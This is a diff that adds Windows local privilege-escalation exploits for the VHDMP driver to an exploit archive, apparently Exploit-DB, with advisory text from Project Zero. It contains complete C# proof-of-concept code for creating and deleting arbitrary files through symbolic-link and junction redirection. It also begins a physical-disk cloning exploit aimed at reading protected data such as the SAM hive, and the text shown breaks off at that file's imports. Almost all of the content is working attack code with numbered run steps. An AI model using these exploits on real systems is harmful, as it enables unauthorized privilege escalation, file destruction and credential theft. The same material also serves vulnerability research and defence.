+            OpenForFreeSpaceQuery = 0x00800000
+        }
+
+        [Flags]
+        public enum GenericAccessRights : uint
+        {
+            None = 0,
+            GenericRead = 0x80000000,
+            GenericWrite = 0x40000000,
+            GenericExecute = 0x20000000,
+            GenericAll = 0x10000000,
+            Delete = 0x00010000,
+            ReadControl = 0x00020000,
+            WriteDac = 0x00040000,
+            WriteOwner = 0x00080000,
+            Synchronize = 0x00100000,
+            MaximumAllowed = 0x02000000,
+        };
+
+
+        [Flags]
+        enum DirectoryAccessRights : uint
+        {
+            Query = 1,
+            Traverse = 2,
+            CreateObject = 4,
+            CreateSubDirectory = 8,
+            GenericRead = 0x80000000,
+            GenericWrite = 0x40000000,
+            GenericExecute = 0x20000000,
+            GenericAll = 0x10000000,
+            Delete = 0x00010000,
+            ReadControl = 0x00020000,
+            WriteDac = 0x00040000,
+            WriteOwner = 0x00080000,
+            Synchronize = 0x00100000,
+            MaximumAllowed = 0x02000000,
+        }
+
+        [Flags]
+        public enum ProcessAccessRights : uint
+        {
+            None = 0,
+            CreateProcess = 0x0080,
+            CreateThread = 0x0002,
+            DupHandle = 0x0040,
+            QueryInformation = 0x0400,
+            QueryLimitedInformation = 0x1000,
+            SetInformation = 0x0200,
+            SetQuota = 0x0100,
+            SuspendResume = 0x0800,
+            Terminate = 0x0001,
+            VmOperation = 0x0008,
+            VmRead = 0x0010,
+            VmWrite = 0x0020,
+            MaximumAllowed = GenericAccessRights.MaximumAllowed
+        };
+
+        [Flags]
+        public enum FileAccessRights : uint
+        {
+            None = 0,
+            ReadData = 0x0001,
+            WriteData = 0x0002,
+            AppendData = 0x0004,
+            ReadEa = 0x0008,
+            WriteEa = 0x0010,
+            Execute = 0x0020,
+            DeleteChild = 0x0040,
+            ReadAttributes = 0x0080,
+            WriteAttributes = 0x0100,
+            GenericRead = 0x80000000,
+            GenericWrite = 0x40000000,
+            GenericExecute = 0x20000000,
+            GenericAll = 0x10000000,
+            Delete = 0x00010000,
+            ReadControl = 0x00020000,
+            WriteDac = 0x00040000,
+            WriteOwner = 0x00080000,
+            Synchronize = 0x00100000,
+            MaximumAllowed = 0x02000000,
+        }
+
+        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+        public sealed class UnicodeString
+        {
+            ushort Length;
+            ushort MaximumLength;
+            [MarshalAs(UnmanagedType.LPWStr)]
+            string Buffer;
+
+            public UnicodeString(string str)
+            {
+                Length = (ushort)(str.Length * 2);
+                MaximumLength = (ushort)((str.Length * 2) + 1);
+                Buffer = str;
+            }
+        }
+
+        [DllImport("ntdll.dll")]
+        static extern int NtClose(IntPtr handle);
+
+        public sealed class SafeKernelObjectHandle
+          : SafeHandleZeroOrMinusOneIsInvalid
+        {
+            public SafeKernelObjectHandle()
+              : base(true)
+            {
+            }
+
+            public SafeKernelObjectHandle(IntPtr handle, bool owns_handle)
+              : base(owns_handle)
+            {
+                SetHandle(handle);
+            }
+
+            protected override bool ReleaseHandle()
+            {
+                if (!IsInvalid)
+                {
+                    NtClose(this.handle);
+                    this.handle = IntPtr.Zero;
+                    return true;
+                }
+                return false;
+            }
+        }
+
+        public enum SecurityImpersonationLevel
+        {
+            Anonymous = 0,
+            Identification = 1,
+            Impersonation = 2,
+            Delegation = 3
+        }
+
+        public enum SecurityContextTrackingMode : byte
+        {
+            Static = 0,
+            Dynamic = 1
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public sealed class SecurityQualityOfService
+        {
+            int Length;
+            public SecurityImpersonationLevel ImpersonationLevel;
+            public SecurityContextTrackingMode ContextTrackingMode;
+            [MarshalAs(UnmanagedType.U1)]
+            public bool EffectiveOnly;
+
+            public SecurityQualityOfService()
+            {
+                Length = Marshal.SizeOf(this);
+            }
+        }
+
+        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+        public sealed class ObjectAttributes : IDisposable
+        {
+            int Length;
+            IntPtr RootDirectory;
+            IntPtr ObjectName;
+            AttributeFlags Attributes;
+            IntPtr SecurityDescriptor;
+            IntPtr SecurityQualityOfService;
+
+            private static IntPtr AllocStruct(object s)
+            {
+                int size = Marshal.SizeOf(s);
+                IntPtr ret = Marshal.AllocHGlobal(size);
+                Marshal.StructureToPtr(s, ret, false);
+                return ret;
+            }
+
+            private static void FreeStruct(ref IntPtr p, Type struct_type)
+            {
+                Marshal.DestroyStructure(p, struct_type);
+                Marshal.FreeHGlobal(p);
+                p = IntPtr.Zero;
+            }
+
+            public ObjectAttributes() : this(AttributeFlags.None)
+            {
+            }
+
+            public ObjectAttributes(string object_name, AttributeFlags attributes) : this(object_name, attributes, null, null, null)
+            {
+            }
+
+            public ObjectAttributes(AttributeFlags attributes) : this(null, attributes, null, null, null)
+            {
+            }
+
+            public ObjectAttributes(string object_name) : this(object_name, AttributeFlags.CaseInsensitive, null, null, null)
+            {
+            }
+
+            public ObjectAttributes(string object_name, AttributeFlags attributes, SafeKernelObjectHandle root, SecurityQualityOfService sqos, GenericSecurityDescriptor security_descriptor)
+            {
+                Length = Marshal.SizeOf(this);
+                if (object_name != null)
+                {
+                    ObjectName = AllocStruct(new UnicodeString(object_name));
+                }
+                Attributes = attributes;
+                if (sqos != null)
+                {
+                    SecurityQualityOfService = AllocStruct(sqos);
+                }
+                if (root != null)
+                    RootDirectory = root.DangerousGetHandle();
+                if (security_descriptor != null)
+                {
+                    byte[] sd_binary = new byte[security_descriptor.BinaryLength];
+                    security_descriptor.GetBinaryForm(sd_binary, 0);
+                    SecurityDescriptor = Marshal.AllocHGlobal(sd_binary.Length);
+                    Marshal.Copy(sd_binary, 0, SecurityDescriptor, sd_binary.Length);
+                }
+            }
+
+            public void Dispose()
+            {
+                if (ObjectName != IntPtr.Zero)
+                {
+                    FreeStruct(ref ObjectName, typeof(UnicodeString));
+                }
+                if (SecurityQualityOfService != IntPtr.Zero)
+                {
+                    FreeStruct(ref SecurityQualityOfService, typeof(SecurityQualityOfService));
+                }
+                if (SecurityDescriptor != IntPtr.Zero)
+                {
+                    Marshal.FreeHGlobal(SecurityDescriptor);
+                    SecurityDescriptor = IntPtr.Zero;
+                }
+                GC.SuppressFinalize(this);
+            }
+
+            ~ObjectAttributes()
+            {
+                Dispose();
+            }
+        }
+
+        [DllImport("ntdll.dll")]
+        public static extern int NtOpenFile(
+            out IntPtr FileHandle,
+            FileAccessRights DesiredAccess,
+            ObjectAttributes ObjAttr,
+            [In] [Out] IoStatus IoStatusBlock,
+            ShareMode ShareAccess,
+            FileOpenOptions OpenOptions);
+
+        public static void StatusToNtException(int status)
+        {
+            if (status < 0)
+            {
+                throw new NtException(status);
+            }
+        }
+
+        public class NtException : ExternalException
+        {
+            [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
+            private static extern IntPtr GetModuleHandle(string modulename);
+
+            [Flags]
+            enum FormatFlags
+            {
+                AllocateBuffer = 0x00000100,
+                FromHModule = 0x00000800,
+                FromSystem = 0x00001000,
+                IgnoreInserts = 0x00000200
+            }
+
+            [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
+            private static extern int FormatMessage(
+              FormatFlags dwFlags,
+              IntPtr lpSource,
+              int dwMessageId,
+              int dwLanguageId,
+              out IntPtr lpBuffer,
+              int nSize,
+              IntPtr Arguments
+            );
+
+            [DllImport("kernel32.dll")]
+            private static extern IntPtr LocalFree(IntPtr p);
+
+            private static string StatusToString(int status)
+            {
+                IntPtr buffer = IntPtr.Zero;
+                try
+                {
+                    if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts,
+                        GetModuleHandle("ntdll.dll"), status, 0, out buffer, 0, IntPtr.Zero) > 0)
+                    {
+                        return Marshal.PtrToStringUni(buffer);
+                    }
+                }
+                finally
+                {
+                    if (buffer != IntPtr.Zero)
+                    {
+                        LocalFree(buffer);
+                    }
+                }
+                return String.Format("Unknown Error: 0x{0:X08}", status);
+            }
+
+            public NtException(int status) : base(StatusToString(status))
+            {
+            }
+        }
+
+        public class SafeHGlobalBuffer : SafeHandleZeroOrMinusOneIsInvalid
+        {
+            public SafeHGlobalBuffer(int length)
+              : this(Marshal.AllocHGlobal(length), length, true)
+            {
+            }
+
+            public SafeHGlobalBuffer(IntPtr buffer, int length, bool owns_handle)
+              : base(owns_handle)
+            {
+                Length = length;
+                SetHandle(buffer);
+            }
+
+            public int Length
+            {
+                get; private set;
+            }
+
+            protected override bool ReleaseHandle()
+            {
+                if (!IsInvalid)
+                {
+                    Marshal.FreeHGlobal(handle);
+                    handle = IntPtr.Zero;
+                }
+                return true;
+            }
+        }
+
+        public class SafeStructureBuffer : SafeHGlobalBuffer
+        {
+            Type _type;
+
+            public SafeStructureBuffer(object value) : base(Marshal.SizeOf(value))
+            {
+                _type = value.GetType();
+                Marshal.StructureToPtr(value, handle, false);
+            }
+
+            protected override bool ReleaseHandle()
+            {
+                if (!IsInvalid)
+                {
+                    Marshal.DestroyStructure(handle, _type);
+                }
+                return base.ReleaseHandle();
+            }
+        }
+
+        public class SafeStructureOutBuffer<T> : SafeHGlobalBuffer
+        {
+            public SafeStructureOutBuffer() : base(Marshal.SizeOf(typeof(T)))
+            {
+            }
+
+            public T Result
+            {
+                get
+                {
+                    if (IsInvalid)
+                        throw new ObjectDisposedException("handle");
+
+                    return Marshal.PtrToStructure<T>(handle);
+                }
+            }
+        }
+
+        public static SafeFileHandle OpenFile(string name, FileAccessRights DesiredAccess, ShareMode ShareAccess, FileOpenOptions OpenOptions, bool inherit)
+        {
+            AttributeFlags flags = AttributeFlags.CaseInsensitive;
+            if (inherit)
+                flags |= AttributeFlags.Inherit;
+            using (ObjectAttributes obja = new ObjectAttributes(name, flags))
+            {
+                IntPtr handle;
+                IoStatus iostatus = new IoStatus();
+                int status = NtOpenFile(out handle, DesiredAccess, obja, iostatus, ShareAccess, OpenOptions);
+                StatusToNtException(status);
+                return new SafeFileHandle(handle, true);
+            }
+        }
+
+        [DllImport("ntdll.dll")]
+        public static extern int NtDeviceIoControlFile(
+          SafeFileHandle FileHandle,
+          IntPtr Event,
+          IntPtr ApcRoutine,
+          IntPtr ApcContext,
+          [Out] IoStatus IoStatusBlock,
+          uint IoControlCode,
+          byte[] InputBuffer,
+          int InputBufferLength,
+          byte[] OutputBuffer,
+          int OutputBufferLength
+        );
+
+        [DllImport("ntdll.dll")]
+        public static extern int NtFsControlFile(
+          SafeFileHandle FileHandle,
+          IntPtr Event,
+          IntPtr ApcRoutine,
+          IntPtr ApcContext,
+          [Out] IoStatus IoStatusBlock,
+          uint FSControlCode,
+          [In] byte[] InputBuffer,
+          int InputBufferLength,
+          [Out] byte[] OutputBuffer,
+          int OutputBufferLength
+        );
+
+        [DllImport("ntdll.dll")]
+        static extern int NtCreateDirectoryObject(out IntPtr Handle, DirectoryAccessRights DesiredAccess, ObjectAttributes ObjectAttributes);
+
+        [DllImport("ntdll.dll")]
+        static extern int NtOpenDirectoryObject(out IntPtr Handle, DirectoryAccessRights DesiredAccess, ObjectAttributes ObjectAttributes);
+
+        const int ProcessDeviceMap = 23;
+
+        [DllImport("ntdll.dll")]
+        static extern int NtSetInformationProcess(
+            IntPtr ProcessHandle,
+            int ProcessInformationClass,
+            byte[] ProcessInformation,
+            int ProcessInformationLength);
+
+        static byte[] StructToBytes(object o)
+        {
+            int size = Marshal.SizeOf(o);
+            IntPtr p = Marshal.AllocHGlobal(size);
+            try
+            {
+                Marshal.StructureToPtr(o, p, false);
+                byte[] ret = new byte[size];
+                Marshal.Copy(p, ret, 0, size);
+                return ret;
+            }
+            finally
+            {
+                if (p != IntPtr.Zero)
+                    Marshal.FreeHGlobal(p);
+            }
+        }
+
+        static byte[] GetBytes(string s)
+        {
+            return Encoding.Unicode.GetBytes(s + "\0");
+        }
+
+        static SafeKernelObjectHandle CreateDirectory(SafeKernelObjectHandle root, string path)
+        {
+            using (ObjectAttributes obja = new ObjectAttributes(path, AttributeFlags.CaseInsensitive, root, null, null))
+            {
+                IntPtr handle;
+                StatusToNtException(NtCreateDirectoryObject(out handle, DirectoryAccessRights.GenericAll, obja));
+                return new SafeKernelObjectHandle(handle, true);
+            }
+        }
+
+        static SafeKernelObjectHandle OpenDirectory(string path)
+        {
+            using (ObjectAttributes obja = new ObjectAttributes(path, AttributeFlags.CaseInsensitive))
+            {
+                IntPtr handle;
+                StatusToNtException(NtOpenDirectoryObject(out handle, DirectoryAccessRights.MaximumAllowed, obja));
+                return new SafeKernelObjectHandle(handle, true);
+            }
+        }
+
+        [DllImport("ntdll.dll")]
+        static extern int NtCreateSymbolicLinkObject(
+            out IntPtr LinkHandle,
+            GenericAccessRights DesiredAccess,
+            ObjectAttributes ObjectAttributes,
+            UnicodeString DestinationName
+        );
+
+        static SafeKernelObjectHandle CreateSymbolicLink(SafeKernelObjectHandle directory, string path, string target)
+        {
+            using (ObjectAttributes obja = new ObjectAttributes(path, AttributeFlags.CaseInsensitive, directory, null, null))
+            {
+                IntPtr handle;
+                StatusToNtException(NtCreateSymbolicLinkObject(out handle, GenericAccessRights.MaximumAllowed, obja, new UnicodeString(target)));
+                return new SafeKernelObjectHandle(handle, true);
+            }
+        }
+
+        static void SetDosDirectory(SafeKernelObjectHandle directory)
+        {
+            IntPtr p = directory.DangerousGetHandle();
+            byte[] data = null;
+            if (IntPtr.Size == 4)
+            {
+                data = BitConverter.GetBytes(p.ToInt32());
+            }
+            else
+            {
+                data = BitConverter.GetBytes(p.ToInt64());
+            }
+
+            StatusToNtException(NtSetInformationProcess(new IntPtr(-1), ProcessDeviceMap, data, data.Length));
+        }
+
+        enum StorageDeviceType
+        {
+            Unknown = 0,
+            Iso = 1,
+            Vhd = 2,
+            Vhdx = 3,
+            VhdSet = 4,
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        struct VirtualStorageType
+        {
+            public StorageDeviceType DeviceId;
+            public Guid VendorId;
+        }
+
+        enum OpenVirtualDiskFlag
+        {
+            None = 0,
+            NoParents = 1,
+            BlankFile = 2,
+            BootDrive = 4,
+            CachedIo = 8,
+            DiffChain = 0x10,
+            ParentcachedIo = 0x20,
+            VhdSetFileOnly = 0x40,
+        }
+
+        enum CreateVirtualDiskVersion
+        {
+            Unspecified = 0,
+            Version1 = 1,
+            Version2 = 2,
+            Version3 = 3,
+        }
+            
+        [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
+        struct CreateVirtualDiskParameters
+        {
+            public CreateVirtualDiskVersion Version;
+            public Guid UniqueId;
+            public ulong MaximumSize;
+            public uint BlockSizeInBytes;
+            public uint SectorSizeInBytes;
+            public uint PhysicalSectorSizeInBytes;
+            [MarshalAs(UnmanagedType.LPWStr)]
+            public string ParentPath;
+            [MarshalAs(UnmanagedType.LPWStr)]
+            public string SourcePath;
+            // Version 2 on
+            public OpenVirtualDiskFlag OpenFlags;
+            public VirtualStorageType ParentVirtualStorageType;
+            public VirtualStorageType SourceVirtualStorageType;
+            public Guid ResiliencyGuid;
+            // Version 3 on
+            [MarshalAs(UnmanagedType.LPWStr)]
+            public string SourceLimitPath;
+            public VirtualStorageType BackingStorageType;
+        }
+
+        enum VirtualDiskAccessMask
+        {
+            None = 0,
+            AttachRo = 0x00010000,
+            AttachRw = 0x00020000,
+            Detach = 0x00040000,
+            GetInfo = 0x00080000,
+            Create = 0x00100000,
+            MetaOps = 0x00200000,
+            Read = 0x000d0000,
+            All = 0x003f0000
+        }
+
+        enum CreateVirtualDiskFlag
+        {
+            None = 0x0,
+            FullPhysicalAllocation = 0x1,
+            PreventWritesToSourceDisk = 0x2,
+            DoNotcopyMetadataFromParent = 0x4,
+            CreateBackingStorage = 0x8,
+            UseChangeTrackingSourceLimit = 0x10,
+            PreserveParentChangeTrackingState = 0x20,
+        }        
+
+        [DllImport("virtdisk.dll", CharSet=CharSet.Unicode)]
+        static extern int CreateVirtualDisk(
+            [In] ref VirtualStorageType VirtualStorageType,
+            string Path,
+            VirtualDiskAccessMask        VirtualDiskAccessMask,
+            [In] byte[] SecurityDescriptor,
+            CreateVirtualDiskFlag        Flags,
+            uint ProviderSpecificFlags,
+            [In] ref CreateVirtualDiskParameters Parameters,
+            IntPtr  Overlapped,
+            out IntPtr Handle
+        );
+
+        static Guid GUID_DEVINTERFACE_SURFACE_VIRTUAL_DRIVE = new Guid("2E34D650-5819-42CA-84AE-D30803BAE505");
+        static Guid VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT = new Guid("EC984AEC-A0F9-47E9-901F-71415A66345B");
+
+        static SafeFileHandle CreateVHD(string path)
+        {
+            VirtualStorageType vhd_type = new VirtualStorageType();
+            vhd_type.DeviceId = StorageDeviceType.Vhd;
+            vhd_type.VendorId = VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT;
+
+            CreateVirtualDiskParameters ps = new CreateVirtualDiskParameters();
+            ps.Version = CreateVirtualDiskVersion.Version1;
+            ps.SectorSizeInBytes = 512;
+            ps.MaximumSize = 100 * 1024 * 1024;
+            IntPtr hDisk;
+            int error = CreateVirtualDisk(ref vhd_type, path, VirtualDiskAccessMask.All, null, CreateVirtualDiskFlag.None, 0, ref ps, IntPtr.Zero, out hDisk);
+            if (error != 0)
+            {
+                throw new Win32Exception(error);
+            }
+
+            return new SafeFileHandle(hDisk, true);
+        }
+
+        enum SetVirtualDiskInfoVersion
+        {
+            Unspecified = 0,
+            ParentPath = 1,
+            Identified = 2,
+            ParentPathWithDepth = 3,
+            PhysicalSectionSize = 4,
+            VirtualDiskId = 5,
+            ChangeTrackingState = 6,
+            ParentLocator = 7,
+        }        
+
+        [StructLayout(LayoutKind.Sequential)]
+        struct SetVirtualDiskInfo
+        {
+            public SetVirtualDiskInfoVersion Version;
+            [MarshalAs(UnmanagedType.Bool)]
+            public bool ChangeTrackingEnabled;
+        }
+
+        [DllImport("virtdisk.dll", CharSet = CharSet.Unicode)]
+        static extern int SetVirtualDiskInformation(
+            SafeFileHandle VirtualDiskHandle,
+            ref SetVirtualDiskInfo VirtualDiskInfo
+        );
+
+        static List<SafeKernelObjectHandle> CreateChainForPath(string path)
+        {
+            string[] parts = path.Split('\\');
+            List<SafeKernelObjectHandle> ret = new List<SafeKernelObjectHandle>();
+            SafeKernelObjectHandle curr = CreateDirectory(null, null);
+            ret.Add(curr);
+            foreach (string part in parts)
+            {
+                curr = CreateDirectory(curr, part);
+                ret.Add(curr);
+            }
+
+            return ret;
+        }
+        
+
+        static void Main(string[] args)
+        {
+            try
+            {
+                string vhd_path = Path.GetFullPath("test.vhd");
+                File.Delete(vhd_path);
+                File.Delete(vhd_path + ".rct");
+                File.Delete(vhd_path + ".mrt");
+
+                Console.WriteLine("[INFO]: Creating VHD {0}", vhd_path);
+                
+                List<SafeKernelObjectHandle> chain = CreateChainForPath(Path.GetDirectoryName(vhd_path));
+                SafeKernelObjectHandle rct_symlink = CreateSymbolicLink(chain.Last(), Path.GetFileName(vhd_path) + ".rct", @"\SystemRoot\abc.txt");
+                SafeKernelObjectHandle mrt_symlink = CreateSymbolicLink(chain.Last(), Path.GetFileName(vhd_path) + ".mrt", @"\SystemRoot\xyz.txt");
+
+                using (SafeFileHandle handle = CreateVHD(vhd_path))
+                {
+                    // Write dummy files for when the kernel impersonates us (and kills the per-process device map)
+                    File.WriteAllBytes(vhd_path + ".rct", new byte[0]);
+                    File.WriteAllBytes(vhd_path + ".mrt", new byte[0]);
+                    SetVirtualDiskInfo disk_info = new SetVirtualDiskInfo();
+                    disk_info.Version = SetVirtualDiskInfoVersion.ChangeTrackingState;
+                    disk_info.ChangeTrackingEnabled = true;
+                    SetDosDirectory(chain.First());
+                    int error = SetVirtualDiskInformation(handle, ref disk_info);
+                    chain[1].Close();
+                    if (error != 0)
+                    {
+                        throw new Win32Exception(error);
+                    }
+                }
+
+                if (!File.Exists(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Windows), "abc.txt")))
+                {
+                    Console.WriteLine("[ERROR]: Didn't create arbitrary file");
+                }
+                else
+                {
+                    Console.WriteLine("[SUCCESS]: Created arbitary file");
+                }
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[ERROR]: {0}", ex.Message);
+            }
+        }
+    }
+}

platforms/windows/local/40764.cs

@@ -0,0 +1,245 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=915
+
+Windows: VHDMP ZwDeleteFile Arbitrary File Deletion EoP
+Platform: Windows 10 10586 and 14393. No idea about 7 or 8.1 versions.
+Class: Elevation of Privilege
+
+Summary:
+The VHDMP driver doesn’t safely delete files leading to arbitrary file deletion which could result in EoP.
+
+Description:
+
+The VHDMP driver is used to mount VHD and ISO files so that they can be accessed as a normal mounted volume. There are numerous places where the driver calls ZwDeleteFile without specifying OBJ_FORCE_ACCESS_CHECK. This can be abused to delete any arbitrary file or directory on the filesystem by abusing symbolic links to redirect the delete file name to an arbitrary location. Also due to the behaviour of ZwDeleteFile we also don’t need to play games with the DosDevices directory or anything like that, the system call opens the target file without specifying FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE flags, this means it’s possible to use a mount point even to redirect to a file due to the way reparsing works in the kernel.
+
+Some places where ZwDeleteFile is called (based on 10586 x64 vhdmp.sys) are:
+
+VhdmpiDeleteRctFiles
+VhdmpiCleanupFileWrapper
+VhdmpiInitializeVhdSetExtract
+VhdmpiCtCreateEnableTrackingRequest
+VhdmpiMultiStageSwitchLogFile
+VhdmpiApplySnapshot
+And much much more.
+
+You get the idea, as far as I can tell none of these calls actually pass OBJ_FORCE_ACCESS_CHECK flag so all would be vulnerable (assuming you can specify the filename suitably). Note this doesn’t need admin rights as we never mount the VHD. However you can’t use it in a sandbox as opening the drive goes through multiple access checks.
+
+While deleting files/directories might not seem to be too important you can use it to delete files in ProgramData or Windows\Temp which normally are OWNER RIGHTS locked to the creator. This could then be recreated by the user due to default DACLs and abuse functionality of other services/applications. 
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# source code file. You need to compile with .NET 4 or higher. It will delete an arbitrary file specified on the command line. It abuses the fact that during VHD creation the kernel will delete the .rct/.mrt files (this limits the poc to Win10 only). So we drop a test.vhd.rct mount point pointing at the target into the same directory and call create.
+
+1) Compile the C# source code file.
+2) Execute the poc on Win 10 passing the path to the file to delete. It will check that the file is present and can’t be deleted.
+3) It should print that it successfully deleted the file
+
+Expected Result:
+The target file isn’t deleted, the VHD creation fails.
+
+Observed Result:
+The target file is deleted.
+*/
+
+using Microsoft.Win32.SafeHandles;
+using System;
+using System.ComponentModel;
+using System.Diagnostics;
+using System.IO;
+using System.Runtime.InteropServices;
+
+namespace DfscTest
+{
+    class Program
+    {
+        enum StorageDeviceType
+        {
+            Unknown = 0,
+            Iso = 1,
+            Vhd = 2,
+            Vhdx = 3,
+            VhdSet = 4,
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        struct VirtualStorageType
+        {
+            public StorageDeviceType DeviceId;
+            public Guid VendorId;
+        }
+
+        enum OpenVirtualDiskFlag
+        {
+            None = 0,
+            NoParents = 1,
+            BlankFile = 2,
+            BootDrive = 4,
+            CachedIo = 8,
+            DiffChain = 0x10,
+            ParentcachedIo = 0x20,
+            VhdSetFileOnly = 0x40,
+        }
+
+        enum CreateVirtualDiskVersion
+        {
+            Unspecified = 0,
+            Version1 = 1,
+            Version2 = 2,
+            Version3 = 3,
+        }
+            
+        [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
+        struct CreateVirtualDiskParameters
+        {
+            public CreateVirtualDiskVersion Version;
+            public Guid UniqueId;
+            public ulong MaximumSize;
+            public uint BlockSizeInBytes;
+            public uint SectorSizeInBytes;
+            public uint PhysicalSectorSizeInBytes;
+            [MarshalAs(UnmanagedType.LPWStr)]
+            public string ParentPath;
+            [MarshalAs(UnmanagedType.LPWStr)]
+            public string SourcePath;
+            // Version 2 on
+            public OpenVirtualDiskFlag OpenFlags;
+            public VirtualStorageType ParentVirtualStorageType;
+            public VirtualStorageType SourceVirtualStorageType;
+            public Guid ResiliencyGuid;
+            // Version 3 on
+            [MarshalAs(UnmanagedType.LPWStr)]
+            public string SourceLimitPath;
+            public VirtualStorageType BackingStorageType;
+        }
+
+        enum VirtualDiskAccessMask
+        {
+            None = 0,
+            AttachRo = 0x00010000,
+            AttachRw = 0x00020000,
+            Detach = 0x00040000,
+            GetInfo = 0x00080000,
+            Create = 0x00100000,
+            MetaOps = 0x00200000,
+            Read = 0x000d0000,
+            All = 0x003f0000
+        }
+
+        enum CreateVirtualDiskFlag
+        {
+            None = 0x0,
+            FullPhysicalAllocation = 0x1,
+            PreventWritesToSourceDisk = 0x2,
+            DoNotcopyMetadataFromParent = 0x4,
+            CreateBackingStorage = 0x8,
+            UseChangeTrackingSourceLimit = 0x10,
+            PreserveParentChangeTrackingState = 0x20,
+        }        
+
+        [DllImport("virtdisk.dll", CharSet=CharSet.Unicode)]
+        static extern int CreateVirtualDisk(
+            [In] ref VirtualStorageType VirtualStorageType,
+            string Path,
+            VirtualDiskAccessMask        VirtualDiskAccessMask,
+            [In] byte[] SecurityDescriptor,
+            CreateVirtualDiskFlag        Flags,
+            uint ProviderSpecificFlags,
+            [In] ref CreateVirtualDiskParameters Parameters,
+            IntPtr  Overlapped,
+            out IntPtr Handle
+        );
+
+        static Guid GUID_DEVINTERFACE_SURFACE_VIRTUAL_DRIVE = new Guid("2E34D650-5819-42CA-84AE-D30803BAE505");
+        static Guid VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT = new Guid("EC984AEC-A0F9-47E9-901F-71415A66345B");
+
+        static SafeFileHandle CreateVHD(string path)
+        {
+            VirtualStorageType vhd_type = new VirtualStorageType();
+            vhd_type.DeviceId = StorageDeviceType.Vhd;
+            vhd_type.VendorId = VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT;
+
+            CreateVirtualDiskParameters ps = new CreateVirtualDiskParameters();
+            ps.Version = CreateVirtualDiskVersion.Version1;
+            ps.SectorSizeInBytes = 512;
+            ps.MaximumSize = 100 * 1024 * 1024;
+            IntPtr hDisk;
+            int error = CreateVirtualDisk(ref vhd_type, path, VirtualDiskAccessMask.All, null, CreateVirtualDiskFlag.None, 0, ref ps, IntPtr.Zero, out hDisk);
+            if (error != 0)
+            {
+                throw new Win32Exception(error);
+            }
+
+            return new SafeFileHandle(hDisk, true);
+        }
+        
+        static void Main(string[] args)
+        {
+            try
+            {
+                if (args.Length < 1)
+                {
+                    Console.WriteLine(@"[USAGE]: poc file\to\delete");
+                    Environment.Exit(1);
+                }
+
+                string delete_path = Path.GetFullPath(args[0]);
+
+                if (!File.Exists(delete_path))
+                {
+                    Console.WriteLine("[ERROR]: Specify a valid file to delete");
+                    Environment.Exit(1);
+                }
+
+                try
+                {
+                    File.Delete(delete_path);
+                    Console.WriteLine("[ERROR]: Could already delete file, choose one which you normally can't delete");
+                    Environment.Exit(1);
+                }
+                catch
+                {                    
+                }
+
+                string vhd_path = Path.GetFullPath("test.vhd");
+                File.Delete(vhd_path);
+                try
+                {
+                    Directory.Delete(vhd_path + ".rct");
+                }
+                catch
+                {
+                }
+
+                Console.WriteLine("[INFO]: Creating VHD {0}", vhd_path);
+                string cmdline = String.Format("/C mklink /J \"{0}.rct\" \"{1}\"", vhd_path, args[0]);
+                ProcessStartInfo start_info = new ProcessStartInfo("cmd", cmdline);
+                start_info.UseShellExecute = false;
+
+                Process p = Process.Start(start_info);
+                p.WaitForExit();
+                if (p.ExitCode != 0)
+                {
+                    Console.WriteLine("[ERROR]: Can't create symlink");
+                    Environment.Exit(1);
+                }
+                
+                using (SafeFileHandle handle = CreateVHD(vhd_path))
+                {
+                }
+
+                if (File.Exists(delete_path))
+                {
+                    Console.WriteLine("[ERROR]: Didn't delete arbitrary file");
+                }
+                else
+                {
+                    Console.WriteLine("[SUCCESS]: Deleted arbitary file");
+                }
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[ERROR]: {0}", ex.Message);
+            }
+        }
+    }
+}

platforms/windows/local/40765.cs

@@ -0,0 +1,257 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=916
+
+Windows: VHDMP Arbitrary Physical Disk Cloning EoP
+Platform: Windows 10 10586. No idea about 14393, 7 or 8.1 versions.
+Class: Elevation of Privilege
+
+Summary:
+The VHDMP driver doesn’t open physical disk drives securely when creating a new VHD leading to information disclosure and EoP by allowing a user to access data they’re shouldn’t have access to.
+
+Description:
+
+The VHDMP driver is used to mount VHD and ISO files so that they can be accessed as a normal mounted volume. When creating a new VHD it’s possible to specify a physical drive to clone from, you’d assume that this feature would be limited to only administrators as accessing a physical disk for read access is limited to administrators group and system. However when calling VhdmpiTryOpenPhysicalDisk the driver uses ZwOpenFile and doesn’t specify the OBJ_FORCE_ACCESS_CHECK flag. As no other administrator checks are done this means that a normal user can clone the physical disk to another file which they can read, to bypass DACL checks on NTFS and extract data such as the SAM hive. 
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# source code file. You need to compile with .NET 4 or higher. It will create a new VHDX from a specified physical drive. Note as this is a physical clone it’ll presumably not bypass Bitlocker, but that’s not likely to be a major issue in a lot of cases.
+
+1) Compile the C# source code file.
+2) Execute the poc on Win 10 passing the path to the vhd file to create and the physical drive index of the drive to clone. If you run without arguments it’ll print which drives are available. You probably want to clone one drive to another otherwise you’d likely run out of space (and of course have enough space). It also should work to copy the vhd out to a network share.
+3) It should print that it created the clone of the drive. If you now mount that VHD somewhere else it should contain the original file systems of the original disk.
+
+Expected Result:
+The VHD creation fails with access denied.
+
+Observed Result:
+The physical disk is cloned successfully.
+*/
+
+using Microsoft.Win32.SafeHandles;
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Diagnostics;
+using System.IO;
